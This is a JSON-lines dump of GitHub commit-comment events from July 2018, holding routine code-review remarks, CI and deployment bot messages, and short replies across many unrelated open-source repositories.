{"id":"7951980473","type":"CommitCommentEvent","actor":{"login":"diamond42"},"repo":{"name":"github-changelog-generator/github-changelog-generator"},"payload":{"comment":{"id":29675495,"position":1,"line":10,"path":"lib/github_changelog_generator/octo_fetcher.rb","commit_id":"0732de5473a0214bb75522c19340763249510b40","created_at":"2018-07-11T18:56:49Z","updated_at":"2018-07-11T18:56:49Z","author_association":"NONE","body":"https://mrwhite.biz/cc/"}},"created_at":"2018-07-11T18:56:49Z"}
{"id":"7951983798","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29675499,"position":null,"line":null,"path":null,"commit_id":"46bd624f93f526e5e4e2adc81d110c257486f94c","created_at":"2018-07-11T18:57:28Z","updated_at":"2018-07-11T18:57:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T18:57:28Z"}
{"id":"7951984521","type":"CommitCommentEvent","actor":{"login":"pholly"},"repo":{"name":"aspnet/Docs"},"payload":{"comment":{"id":29675500,"position":null,"line":null,"path":null,"commit_id":"63a95d2eb4471f051fef23ecfdea23d7d87e27f8","created_at":"2018-07-11T18:57:37Z","updated_at":"2018-07-11T18:57:37Z","author_association":"NONE","body":"I think the overload comments only make sense after the AddDefaultIdentity comments.\r\n\r\nIf you want to keep the AddDefaultIdentity comment and code simple, I suggest adding the TRole comment and code below it.  All commented out is fine."}},"created_at":"2018-07-11T18:57:37Z"}
{"id":"7951985769","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29675501,"position":null,"line":null,"path":null,"commit_id":"dbcec24aca49797b45042dc69378d19067e4c60a","created_at":"2018-07-11T18:57:51Z","updated_at":"2018-07-11T18:57:51Z","author_association":"CONTRIBUTOR","body":"Before the referenced commit c29628b there have been two tests that have been calling `checkExpectedLogSubstring()` at their end.\r\nCurrently there is only one test that never called `checkExpectedLogSubstring()` at its end.\r\n\r\nThe current expected log strings are not valid for the remaining test. It only logs the below ones (and this only if the `git` implementation is used).\r\n```\r\n*** Logging started ***\r\n> git --version # timeout=10\r\nusing GIT_SSH to set credentials private key from ...\r\n> git ls-remote -h https://github.com/jenkinsci/git-client-plugin.git # timeout=10\r\n```\r\nDo you think any of them should be checked? (I still prefer to remove this code.)"}},"created_at":"2018-07-11T18:57:51Z"}
{"id":"7951986904","type":"CommitCommentEvent","actor":{"login":"g5v991x"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29675509,"position":null,"line":null,"path":null,"commit_id":"5fbbfc0d9547805c123320c735d130937a801285","created_at":"2018-07-11T18:58:06Z","updated_at":"2018-07-11T18:58:06Z","author_association":"CONTRIBUTOR","body":"text files with numbers in a nx2 matrix\n\n> On Jul 11, 2018, at 1:54 PM, shadow_walker <notifications@github.com> wrote:\n> \n> point cloud file?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/cryoem/eman2/commit/5fbbfc0d9547805c123320c735d130937a801285#commitcomment-29675467>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ALgM6HBNH0B5Nj_Mri6_xVIMlgbaMaPPks5uFknegaJpZM4VLm2O>.\n> \n\n"}},"created_at":"2018-07-11T18:58:06Z"}
{"id":"7951991275","type":"CommitCommentEvent","actor":{"login":"lucsoft"},"repo":{"name":"Rubicon-Bot/Rubicon"},"payload":{"comment":{"id":29675519,"position":1,"line":1,"path":"config.json","commit_id":"4e0d6478278991cb789ec09b0b96e9b0ae9a534d","created_at":"2018-07-11T18:58:59Z","updated_at":"2018-07-11T18:58:59Z","author_association":"MEMBER","body":"this is not good"}},"created_at":"2018-07-11T18:58:59Z"}
{"id":"7951993263","type":"CommitCommentEvent","actor":{"login":"bfred-it"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29675522,"position":null,"line":null,"path":null,"commit_id":"74d7841c8f781b31843dfc8896a49855fbf8eb43","created_at":"2018-07-11T18:59:22Z","updated_at":"2018-07-11T18:59:22Z","author_association":"COLLABORATOR","body":"Thought so, that's why I pushed it separately. I reverted it"}},"created_at":"2018-07-11T18:59:22Z"}
{"id":"7952001003","type":"CommitCommentEvent","actor":{"login":"joeyzoland"},"repo":{"name":"VMCAuctions/VMCAuction"},"payload":{"comment":{"id":29675544,"position":null,"line":null,"path":null,"commit_id":"0a57c954b656174af4a5c858589f15993fc1fb93","created_at":"2018-07-11T19:00:51Z","updated_at":"2018-07-11T19:00:51Z","author_association":"CONTRIBUTOR","body":"This was somewhat of duplicate work, although we may eventually want to implement it due to the superior data structure of a hash map in users.invoice function"}},"created_at":"2018-07-11T19:00:51Z"}
{"id":"7952002001","type":"CommitCommentEvent","actor":{"login":"jordanbyron"},"repo":{"name":"tneems/tneems.github.io"},"payload":{"comment":{"id":29675547,"position":null,"line":null,"path":null,"commit_id":"b19bd4df13fc63a7aab4302d858b18dc8648ffa4","created_at":"2018-07-11T19:01:03Z","updated_at":"2018-07-11T19:01:03Z","author_association":"NONE","body":":trollface: `<marquee>`"}},"created_at":"2018-07-11T19:01:03Z"}
{"id":"7952011199","type":"CommitCommentEvent","actor":{"login":"paulossa"},"repo":{"name":"paulossa/gocomp"},"payload":{"comment":{"id":29675569,"position":49,"line":184,"path":"eclipseWorkspace/GoTranslator/spec/rules.flex","commit_id":"2f1af8e3e5c2aad6df6c9bcd47888d11d49c6016","created_at":"2018-07-11T19:02:56Z","updated_at":"2018-07-11T19:02:56Z","author_association":"OWNER","body":"?????????????????? ????? \r\n\r\n"}},"created_at":"2018-07-11T19:02:56Z"}
{"id":"7952016653","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29675582,"position":24,"line":90,"path":"src/KeyboardPrefixSelectionMixin.js","commit_id":"4ff1514000d386e34d513e7685599b274a09fe5c","created_at":"2018-07-11T19:04:06Z","updated_at":"2018-07-11T19:04:06Z","author_association":"CONTRIBUTOR","body":"https://github.com/elix/elix/pull/81"}},"created_at":"2018-07-11T19:04:06Z"}
{"id":"7952017695","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Devoxin/Lavalink.py"},"payload":{"comment":{"id":29675583,"position":8,"line":190,"path":"lavalink/PlayerManager.py","commit_id":"78d6a3a436c24af1d5aa6180cf944aa115fbc570","created_at":"2018-07-11T19:04:19Z","updated_at":"2018-07-11T19:04:19Z","author_association":"OWNER","body":"Why is a new player being instantiated here?"}},"created_at":"2018-07-11T19:04:19Z"}
{"id":"7952020000","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Devoxin/Lavalink.py"},"payload":{"comment":{"id":29675590,"position":11,"line":193,"path":"lavalink/PlayerManager.py","commit_id":"78d6a3a436c24af1d5aa6180cf944aa115fbc570","created_at":"2018-07-11T19:04:47Z","updated_at":"2018-07-11T19:04:47Z","author_association":"OWNER","body":"Probably not worth returning anything"}},"created_at":"2018-07-11T19:04:47Z"}
{"id":"7952022706","type":"CommitCommentEvent","actor":{"login":"NonyNo3lle"},"repo":{"name":"sborenst/ansible_agnostic_deployer"},"payload":{"comment":{"id":29675593,"position":null,"line":null,"path":null,"commit_id":"0df2eb6a33c22ef3b00b115dc7e1faaf76150a09","created_at":"2018-07-11T19:05:23Z","updated_at":"2018-07-11T19:05:23Z","author_association":"COLLABORATOR","body":"We also need to make sure this is deleted when removing"}},"created_at":"2018-07-11T19:05:23Z"}
{"id":"7952023498","type":"CommitCommentEvent","actor":{"login":"miscco"},"repo":{"name":"antlarr/bard"},"payload":{"comment":{"id":29675595,"position":55,"line":120,"path":"bard/bard_ext.cpp","commit_id":"52bce48eca635f6210036366759ecd9c27ea0924","created_at":"2018-07-11T19:05:33Z","updated_at":"2018-07-11T19:05:33Z","author_association":"NONE","body":"This is superfluous, emplace_back forwards the arguments to the constructor, which is the same thing that std::make_pair does. So you should rather use:\r\n    m_fingerprints.emplace_back(songID, v);\r\n"}},"created_at":"2018-07-11T19:05:33Z"}
{"id":"7952025170","type":"CommitCommentEvent","actor":{"login":"maximburyak"},"repo":{"name":"ravendb/ravendb"},"payload":{"comment":{"id":29675600,"position":25,"line":198,"path":"src/Raven.Client/Documents/Subscriptions/SubscriptionWorker.cs","commit_id":"6676a2bfc5c6fe9b58ca4a6521aa0e9eecc8be8e","created_at":"2018-07-11T19:05:53Z","updated_at":"2018-07-11T19:05:53Z","author_association":"CONTRIBUTOR","body":"Please make sure that for early client versions, server's response format don't change."}},"created_at":"2018-07-11T19:05:53Z"}
{"id":"7952026312","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pynio-feedstock"},"payload":{"comment":{"id":29675603,"position":null,"line":null,"path":null,"commit_id":"380c847f00e6a0b908b402e784f29731b73dc86f","created_at":"2018-07-11T19:06:09Z","updated_at":"2018-07-11T19:06:09Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @marylhaley were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @marylhaley were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T19:06:09Z"}
{"id":"7952036533","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29675620,"position":null,"line":null,"path":null,"commit_id":"055c99b3ff38c26b5cf583b93a925f95e27f8952","created_at":"2018-07-11T19:08:13Z","updated_at":"2018-07-11T19:08:13Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-media](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-media).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-media-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-11T19:08:13Z"}
{"id":"7952041412","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/rebound-feedstock"},"payload":{"comment":{"id":29675635,"position":null,"line":null,"path":null,"commit_id":"9b24527ce9629237a5334f3881166855c4ca8096","created_at":"2018-07-11T19:09:15Z","updated_at":"2018-07-11T19:09:15Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @acblock were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @acblock were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T19:09:15Z"}
{"id":"7952044830","type":"CommitCommentEvent","actor":{"login":"ferjx"},"repo":{"name":"ferjx/git-sample"},"payload":{"comment":{"id":29675644,"position":2,"line":2,"path":"README.md","commit_id":"6850134c17a241a6a192fa54c999322e3f7de723","created_at":"2018-07-11T19:09:59Z","updated_at":"2018-07-11T19:09:59Z","author_association":"OWNER","body":"Help"}},"created_at":"2018-07-11T19:09:59Z"}
{"id":"7952045784","type":"CommitCommentEvent","actor":{"login":"miscco"},"repo":{"name":"antlarr/bard"},"payload":{"comment":{"id":29675648,"position":23,"line":79,"path":"bard/bard_ext.cpp","commit_id":"52bce48eca635f6210036366759ecd9c27ea0924","created_at":"2018-07-11T19:10:12Z","updated_at":"2018-07-11T19:10:12Z","author_association":"NONE","body":"Rather than declaring an unneeded default constructor you can simply use member initialiation and declare \r\nint m_maxoffset{50};\r\n\r\nThat way you would not need the constructor at all.\r\n"}},"created_at":"2018-07-11T19:10:12Z"}
{"id":"7952048774","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29675657,"position":null,"line":null,"path":null,"commit_id":"c6c5bcd2555e6ca4549b8580231b7b18b109c448","created_at":"2018-07-11T19:10:49Z","updated_at":"2018-07-11T19:10:49Z","author_association":"COLLABORATOR","body":"<h3>[Spinner] Classes.LARGE/SMALL determine default size (#2667)</h3>\n\nPreview: <strong><a href='https://18315-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18315-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18315-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T19:10:49Z"}
{"id":"7952054011","type":"CommitCommentEvent","actor":{"login":"remram44"},"repo":{"name":"carpentries/workshop-template"},"payload":{"comment":{"id":29675676,"position":63,"line":51,"path":"_config.yml","commit_id":"e98dff02e4966b60c053a61c55fee36da9debbdf","created_at":"2018-07-11T19:11:53Z","updated_at":"2018-07-11T19:11:53Z","author_association":"CONTRIBUTOR","body":"Those changes were NOT reflected in `index.md`, breaking survey links in all workshop websites #506"}},"created_at":"2018-07-11T19:11:53Z"}
{"id":"7952065491","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29675703,"position":37,"line":37,"path":"dedshroom/utils/storage.js","commit_id":"5d2e31a1c8201561e4c1449637f18efe3bc06de0","created_at":"2018-07-11T19:14:20Z","updated_at":"2018-07-11T19:14:20Z","author_association":"OWNER","body":"Works as long as not encountering functions, other non-json-convertable properties or cycle-patterns."}},"created_at":"2018-07-11T19:14:20Z"}
{"id":"7952065662","type":"CommitCommentEvent","actor":{"login":"YanpengDai"},"repo":{"name":"cvxgrp/qcqp"},"payload":{"comment":{"id":29675705,"position":null,"line":null,"path":null,"commit_id":"bebd18c1e59516a21b0ff001a5e6fa8304f6fc76","created_at":"2018-07-11T19:14:23Z","updated_at":"2018-07-11T19:14:23Z","author_association":"NONE","body":"Thank you for your contributions on the cvxpy. But I still have the error when import qcqp. \r\n\r\nThe error is 'can not import name 'QuadCoeffExtractor'. Can you help me to solve this error?\r\n\r\np.s., My cvxpy version is 1.0.6 and qcqp version is 0.8.2. "}},"created_at":"2018-07-11T19:14:23Z"}
{"id":"7952095495","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29675765,"position":null,"line":null,"path":null,"commit_id":"6b270bca0c70d67f23650a4d242d98ff26e87614","created_at":"2018-07-11T19:20:41Z","updated_at":"2018-07-11T19:20:41Z","author_association":"NONE","body":"issue_6736 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2932 of 2933 tests passed, 117 test warnings)\n\nMessages:\n\n * 100 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 16 tests had: Table small diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6b270bca0c70d67f23650a4d242d98ff26e87614-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6b270bca0c70d67f23650a4d242d98ff26e87614-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T19:20:41Z"}
{"id":"7952095761","type":"CommitCommentEvent","actor":{"login":"lucasfranzolin"},"repo":{"name":"lucasfranzolin/alpha-blog"},"payload":{"comment":{"id":29675766,"position":null,"line":null,"path":null,"commit_id":"e8170cc25f85d4f7245a37f191d7a97d669f9c71","created_at":"2018-07-11T19:20:45Z","updated_at":"2018-07-11T19:20:45Z","author_association":"OWNER","body":"~bundle install --without production"}},"created_at":"2018-07-11T19:20:45Z"}
{"id":"7952096213","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29675767,"position":null,"line":null,"path":null,"commit_id":"77eadd00249455b7c050e089286b2a53f2507467","created_at":"2018-07-11T19:20:51Z","updated_at":"2018-07-11T19:20:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T19:20:51Z"}
{"id":"7952099245","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29675771,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-11T19:21:30Z","updated_at":"2018-07-11T19:21:30Z","author_association":"NONE","body":"develop (rraustad) - x86_64-MacOS-10.9-clang: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T19:21:30Z"}
{"id":"7952099406","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29675772,"position":null,"line":null,"path":null,"commit_id":"2a5f85c613a229841c3865bed8b7dda618e3a2e4","created_at":"2018-07-11T19:21:32Z","updated_at":"2018-07-11T19:21:32Z","author_association":"COLLABORATOR","body":"As of now, the JPanel is just a placeholder (totally empty). It'll probably be used to add options for fine-tuning graph selections. Either that or I'll just delete it and do nothing with it, period."}},"created_at":"2018-07-11T19:21:32Z"}
{"id":"7952099466","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29675773,"position":null,"line":null,"path":null,"commit_id":"8644ff5926f25bd02dbe389f3081f91e04c459c0","created_at":"2018-07-11T19:21:33Z","updated_at":"2018-07-11T19:21:33Z","author_association":"COLLABORATOR","body":"<h3>fix dark minimal buttons (#2670)</h3>\n\nPreview: <strong><a href='https://18343-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18343-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18343-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T19:21:33Z"}
{"id":"7952101004","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29675776,"position":null,"line":null,"path":null,"commit_id":"c998d0be543805604bfbe09e5b5b2192f177b87f","created_at":"2018-07-11T19:21:53Z","updated_at":"2018-07-11T19:21:53Z","author_association":"COLLABORATOR","body":"<h3>[Icon] use desc element for title (no browser tootltip, still a11y) (#2671)</h3>\n\nPreview: <strong><a href='https://18344-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18344-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18344-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T19:21:53Z"}
{"id":"7952105999","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29675785,"position":null,"line":null,"path":null,"commit_id":"1fefab753fadaba56ab23788376f66de9e39c49b","created_at":"2018-07-11T19:22:57Z","updated_at":"2018-07-11T19:22:57Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-media](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-media).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-media-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-11T19:22:57Z"}
{"id":"7952108517","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29675791,"position":null,"line":null,"path":null,"commit_id":"773c6af7aa135cfa781e59950d67559a84b217ce","created_at":"2018-07-11T19:23:27Z","updated_at":"2018-07-11T19:23:27Z","author_association":"COLLABORATOR","body":"_shhhhshshshs_ I'm just not used to semicolons and when js doesn't enforce them, they're easy to miss :D"}},"created_at":"2018-07-11T19:23:27Z"}
{"id":"7952108921","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29675792,"position":null,"line":null,"path":null,"commit_id":"c727c84aed9f398d4ce4e3e7ea6dcee09f6c9985","created_at":"2018-07-11T19:23:32Z","updated_at":"2018-07-11T19:23:32Z","author_association":"COLLABORATOR","body":"<h3>Fix support for generic types in Tree component (#2629)</h3>\n\nPreview: <strong><a href='https://18350-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18350-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18350-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T19:23:32Z"}
{"id":"7952110361","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29675793,"position":101,"line":63,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T19:23:53Z","updated_at":"2018-07-11T19:23:53Z","author_association":"OWNER","body":"So the idea was to generate the hash of sender,receiver then optx so that it remains unique for a sender, receiver then two optx combinations. Please suggest if it is the right approach..."}},"created_at":"2018-07-11T19:23:53Z"}
{"id":"7952133551","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29675841,"position":null,"line":null,"path":null,"commit_id":"cdcec8d09679b817459a220f21ad0abf9d435c5c","created_at":"2018-07-11T19:29:01Z","updated_at":"2018-07-11T19:29:01Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T19:29:01Z"}
{"id":"7952139729","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"Nebri/deck"},"payload":{"comment":{"id":29675855,"position":36,"line":null,"path":"lib/Controller/PageController.php","commit_id":"ba378ea00b36f5a13ff20f0e869a65de153cf791","created_at":"2018-07-11T19:30:24Z","updated_at":"2018-07-11T19:30:24Z","author_association":"NONE","body":"Looks good :+1:"}},"created_at":"2018-07-11T19:30:24Z"}
{"id":"7952142117","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"Nebri/deck"},"payload":{"comment":{"id":29675859,"position":4,"line":null,"path":"l10n/en_GB.js","commit_id":"ba378ea00b36f5a13ff20f0e869a65de153cf791","created_at":"2018-07-11T19:30:54Z","updated_at":"2018-07-11T19:30:54Z","author_association":"NONE","body":"Please remove those changes, they will be added by transifex, as mentioned."}},"created_at":"2018-07-11T19:30:54Z"}
{"id":"7952142267","type":"CommitCommentEvent","actor":{"login":"alexvilper"},"repo":{"name":"AutoMapper/AutoMapper"},"payload":{"comment":{"id":29675860,"position":30,"line":604,"path":"src/AutoMapper/Execution/TypeMapPlanBuilder.cs","commit_id":"923468efc39a233d3990afcb2737707b76a08bb6","created_at":"2018-07-11T19:30:56Z","updated_at":"2018-07-11T19:30:56Z","author_association":"NONE","body":"Thanks Lucian!"}},"created_at":"2018-07-11T19:30:56Z"}
{"id":"7952143752","type":"CommitCommentEvent","actor":{"login":"ciotlosm"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29675864,"position":60,"line":76,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T19:31:15Z","updated_at":"2018-07-11T19:31:15Z","author_association":"NONE","body":"Maybe combine this with the above _LOGGER.debug('Found %s in string %s', card, string)"}},"created_at":"2018-07-11T19:31:15Z"}
{"id":"7952145262","type":"CommitCommentEvent","actor":{"login":"rplessl"},"repo":{"name":"rplessl/roundcube-vacation-plugin"},"payload":{"comment":{"id":29675867,"position":null,"line":null,"path":null,"commit_id":"6b201d9dd76bd39ef820cf174cd0f8f789e4de58","created_at":"2018-07-11T19:31:35Z","updated_at":"2018-07-11T19:31:35Z","author_association":"OWNER","body":"Thanks @apis-mirea for the rusian translation.\r\n\r\nCloses #8 "}},"created_at":"2018-07-11T19:31:35Z"}
{"id":"7952146164","type":"CommitCommentEvent","actor":{"login":"devoncarew"},"repo":{"name":"google/codemirror.dart"},"payload":{"comment":{"id":29675868,"position":7,"line":42,"path":"tool/grind.dart","commit_id":"34a08f63abf3a0bbde2f04b94dabcfc92f93a3d8","created_at":"2018-07-11T19:31:47Z","updated_at":"2018-07-11T19:31:47Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-11T19:31:47Z"}
{"id":"7952146918","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/qcodes-feedstock"},"payload":{"comment":{"id":29675871,"position":null,"line":null,"path":null,"commit_id":"7c775c957ad6ffb518e138e4c7e2bfe1c9628616","created_at":"2018-07-11T19:31:58Z","updated_at":"2018-07-11T19:31:58Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @adriaanrol were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @adriaanrol were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T19:31:58Z"}
{"id":"7952147723","type":"CommitCommentEvent","actor":{"login":"alamusi"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29675874,"position":1,"line":1,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T19:32:09Z","updated_at":"2018-07-11T19:32:09Z","author_association":"NONE","body":"the name is a bit long, how about we call it \"database dirty flag\" why and how"}},"created_at":"2018-07-11T19:32:09Z"}
{"id":"7952148176","type":"CommitCommentEvent","actor":{"login":"mbrandonw"},"repo":{"name":"pointfreeco/swift-tagged"},"payload":{"comment":{"id":29675876,"position":9,"line":10,"path":"Sources/TaggedTime/TaggedTime.swift","commit_id":"257eed1dc8b92139732328a1be2a9b37e9d5e121","created_at":"2018-07-11T19:32:14Z","updated_at":"2018-07-11T19:32:14Z","author_association":"MEMBER","body":"that was already removed, but I don't think we should merge until we figure out if the project is in ok shape."}},"created_at":"2018-07-11T19:32:14Z"}
{"id":"7952150451","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29675878,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-11T19:32:46Z","updated_at":"2018-07-11T19:32:46Z","author_association":"NONE","body":"I wonder if the timeouts in the previous batches are causing high residuals with later batches?\r\nWhen the SPRT finishes do they get purged or is there a way to fix it somehow?"}},"created_at":"2018-07-11T19:32:46Z"}
